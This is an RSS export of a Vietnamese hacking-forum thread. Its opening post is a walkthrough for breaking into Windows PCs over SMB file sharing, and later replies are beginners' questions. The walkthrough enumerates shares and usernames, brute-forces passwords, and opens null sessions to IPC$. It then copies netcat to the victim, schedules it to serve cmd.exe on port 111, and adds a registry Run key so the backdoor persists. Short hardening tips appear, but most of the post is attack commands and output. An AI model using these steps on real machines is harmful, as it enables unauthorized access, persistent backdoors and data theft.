<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "Hacking PC resource share - Hướng đi và giải pháp"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/12.hva</link>
		<description><![CDATA[Latest messages posted in the topic "Hacking PC resource share - Hướng đi và giải pháp"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ 
<i>Tác giả: ZENO-HVAOnline</i>

<font color='olive'><i>Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha).</i></font> 

Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn)

Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể.
Vậy hacker làm như thế nào để Hack?

<i><b>Hacking thông qua resource share:</b></i>

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …)
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn. 
Chỉ bằng vài dòng lệnh đơn giản trên comand line:

<blockquote>

CODE

[C:\>Net view \\x.x.x.x  ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
C             Disk
PRJA3       Disk
The command completed successfully.
C:\>&nbsp;
		</blockquote>


Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?). 
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:


CODE


<blockquote>C:\> net use z: \\x.x.x.x \share
The command completed successfully&nbsp;
		</blockquote>.



Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :


CODE


C<blockquote>:\> Nbtstat –A x.x.x.x

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
ADMIN            <00>  UNIQUE          Registered
BODY              <00>  GROUP           Registered
ADMIN    f        <20>  UNIQUE           Registered
BODY              <1E>  GROUP            Registered
BODY              <1D>  UNIQUE           Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-08-A1-5B-E3-8C&nbsp;
		</blockquote>


Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt


CODE


<blockquote>“” ADMIN
123456 ADMIN
123456 BODY
“” BODY
…&nbsp;
		</blockquote>

Sau đó hacker crack bang lệnh :
[/CODE]
Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:


CODE

<blockquote>
C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt &nbsp;
		</blockquote>

Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)


CODE


<blockquote>C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.&nbsp;
		</blockquote>
Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:


CODE

<blockquote>C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully  &nbsp;
		</blockquote>
Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao ) 

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:



CODE

<blockquote>C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.&nbsp;
		</blockquote>


Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim



CODE

C<blockquote>:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
              1 file copies&nbsp;
		</blockquote>
Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này) 



<blockquote>CODE

C:\> sc \\x.x.x.x  start  schedule
       service_name : schedule&nbsp;
		</blockquote>

Bây giờ kiểm tra giờ trên máy victim



CODE

<blockquote>C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.&nbsp;
		</blockquote>


Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:



CODE

<blockquote>C:\>AT  \\x.x.x.x  4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1&nbsp;
		</blockquote>
đợi đến 4:55 rồi chạy thử nc.exe



CODE

<blockquote>C:\>nc –nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\windows>&nbsp;
		</blockquote>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:



CODE

<blockquote>Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"&nbsp;
		</blockquote>

Sau đó copy sang máy victim và chạy nha! 
Hy vọng mọi người đừng phá hoại nha ! Thân

<i>Tác giả: ZENO-HVAOnline</i>

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#4650</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#4650</link>
				<pubDate><![CDATA[Thu, 6 Jul 2006 17:23:01]]> GMT</pubDate>
				<author><![CDATA[ phuchn71]]></author>
			</item>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ sao tôi dùng lệnh
c:\net view x.x.x.x  
nhưng địa chỉ IP nao cũng không được vậy]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#265285</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#265285</link>
				<pubDate><![CDATA[Tue, 19 Jun 2012 10:08:25]]> GMT</pubDate>
				<author><![CDATA[ boyvjp_hacker]]></author>
			</item>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">boyvjp_hacker wrote:</cite><br>
		<blockquote>sao tôi dùng lệnh
c:\net view x.x.x.x  
nhưng địa chỉ IP nao cũng không được vậy&nbsp;
		</blockquote>

Bạn đọc kĩ lại đi.
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>net view \\x.x.x.x</pre>
		</div>
chứ không phải
<blockquote>net view x.x.x.x&nbsp;
		</blockquote>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#265287</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#265287</link>
				<pubDate><![CDATA[Tue, 19 Jun 2012 14:08:07]]> GMT</pubDate>
				<author><![CDATA[ bolzano_1989]]></author>
			</item>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">boyvjp_hacker wrote:</cite><br>
		<blockquote>sao tôi dùng lệnh
c:\net view x.x.x.x  
nhưng địa chỉ IP nao cũng không được vậy&nbsp;
		</blockquote>
mệt mấy chú này thật chứ mấy cái lệnh cơ bản nhất củng không song mà tối ngày "hac hit", đặt cái nick thấy mất cảm tình rồi.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#265347</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#265347</link>
				<pubDate><![CDATA[Wed, 20 Jun 2012 12:57:58]]> GMT</pubDate>
				<author><![CDATA[ gaubeo92]]></author>
			</item>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ cho em hỏi là x.x.x.x thì dùng ip tĩnh hay ip động thế? mà động thì phải dụ dỗ để lấy được ah`.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#274162</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#274162</link>
				<pubDate><![CDATA[Mon, 18 Mar 2013 08:36:04]]> GMT</pubDate>
				<author><![CDATA[ hackervn297]]></author>
			</item>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ .trên mạng Internet thì nếu giao tiếp với nhau chỉ thấy được Wan IP của Victim thôi chứ?-Tức là cái IP mà ISP cấp cho con modem nhà bạn thôi...]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#275357</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#275357</link>
				<pubDate><![CDATA[Wed, 1 May 2013 09:31:22]]> GMT</pubDate>
				<author><![CDATA[ cuongps]]></author>
			</item>
			<item>
				<title>Hacking PC resource share - Hướng đi và giải pháp</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">cuongps wrote:</cite><br>
		<blockquote>.trên mạng Internet thì nếu giao tiếp với nhau chỉ thấy được Wan IP của Victim thôi chứ?-Tức là cái IP mà ISP cấp cho con modem nhà bạn thôi...&nbsp;
		</blockquote>

Có chỗ em không hiểu. Theo như anh cuongps nói thì một nhà có 3 mấy tính sử dụng chung một modem thì có chũng một Wan IP sao? hì hì.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/1106.hva#275515</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/1106.hva#275515</link>
				<pubDate><![CDATA[Mon, 6 May 2013 22:10:30]]> GMT</pubDate>
				<author><![CDATA[ manh.kqha]]></author>
			</item>
	</channel>
</rss>
